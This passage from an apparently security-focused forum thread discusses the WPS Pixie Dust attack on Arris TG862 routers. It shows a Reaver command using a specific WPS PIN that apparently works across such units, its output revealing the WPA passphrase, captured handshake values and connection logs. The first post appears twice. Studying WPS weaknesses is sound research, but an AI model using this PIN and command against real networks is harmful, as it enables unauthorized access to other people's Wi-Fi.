WPS Pixie Dust Attack (Offline WPS Attack)

[aanarchyy]

Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

Screenshot2.png

But attempting 42000648 does indeed work!

Code:

root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:AC:E0:3E:DB:10
[+] Switching mon0 to channel 6
[+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
[+] Trying pin 42000648
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '42000648'
[+] WPA PSK: 'basket1744chase'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.

But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?

[soxrok2212]

I'm glad you tested it however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?

[cyber.tao.flow]

I just had this same thing happen with a TG862

M1 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M1 wps.public_key : 26523c5c10fbecb8dacebd499b943381dd5d959a19b0dd3de6 d6092296be009f6d0043e0d0468b6169640a42c2a755451d6a a21c0c9fa581868ffc39cb9b9dd61f75f2d1b37b10724fe526 3f2f0ef51d447a37c04d3634b3cadb864209b6288276daa193 10c1414162af40da6d5cf524791ce746fb4e6bb044fe531683 a4f57cd4e864a4beb6b9e397c10f1b2673306ef6ccb81e8cff 0086cbbddb546d2e33a4ce02f305d36f1a6d3e6a075dace5e4 54a7b7fc41b9df1a4739b67c071da0b4ba
M2 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M2 wps.public_key : 1c5abc81aa3b2e019322275d81fdba8d781a670c7bbb2e72f1 41b9559fba622f1d664a2d088f3d86aec4ac054d8fe32afa61 5c44641e0b87736f5f533edbf4c2c170d38fab28aaadecb812 687b1d69f5314179c1b8c71d5f6302788a112826cb2e359703 d4039a9ee4c2c7d8f3cc2174db2738f67cc64677111d995680 42d38748fd0963cabda0ee6c2eb911d428647b9401df6d4ac7 5e7c9d57ddcf914bcf18f9dd138b3a09726b5c906f6a539cbe cab2fc2acd415168e424d4cd45db6f8008
M2 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M2 wps.authenticator : 25706c21a1637948
M3 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M3 wps.authenticator : 8c8ac40a5d2fba7c
M3 wps.e_hash1 : 40d578a860d7c7b7fa9164734821be696de11dde1026b62e58 6027685d44bda6
M3 wps.e_hash2 : 47f0d473cbb32fee2ebe20ce4f151c15a17d6b7695fa536ed7 779369de8e6a81
M4 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M4 wps.authenticator : d1a7f72e8569b045
M4 wps.encrypted_settings : 97e680a1c5c31d6ff777219bb0f1928cdbc056f38f894530cf f61b317343cd599b2a3501a7defe012fcab40097efa202e927 7d5605bfa84e62be20b985db5797
M4 wps.r_hash1 : a9def4675aa789fe6f6d1cbb2e5a428184690698a6a65f9a80 05c147b5cd73a1
M4 wps.r_hash2 : 2b84cb17f955b22fe165c4bfa2b81a0d41ae7681960269063f c7e11fd48660dc


Client wps.manufacturer :
Client wps.device_name :
Client wps.os_version : 2147483648
Client wlan.ta : 00:19:e3:06:7e:44
Client wps.model_name :
Client wps.model_number :
Client wps.serial_number :
AP wps.manufacturer : ARRIS
AP wps.device_name : ARRIS TG862 Router
AP wps.os_version : 2147483648
AP wlan.ta : 00:1d:d6:ab:8f:40
AP wps.model_name : TG862G
AP wps.model_number : RT2860
AP wps.serial_number : 12345678

Adittionaly it appears to receive the creds then fail the WPS ?

<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300 020022100f0002000c10270010314443384538303932413943 3030343110200006001dd6ab8f40
<3>WPS-FAIL msg=11 config_error=0
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>WPS-FAIL
<3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
<3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]

Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

Screenshot2.png

But attempting 42000648 does indeed work!

Code:

root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:AC:E0:3E:DB:10
[+] Switching mon0 to channel 6
[+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
[+] Trying pin 42000648
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '42000648'
[+] WPA PSK: 'basket1744chase'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.

But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?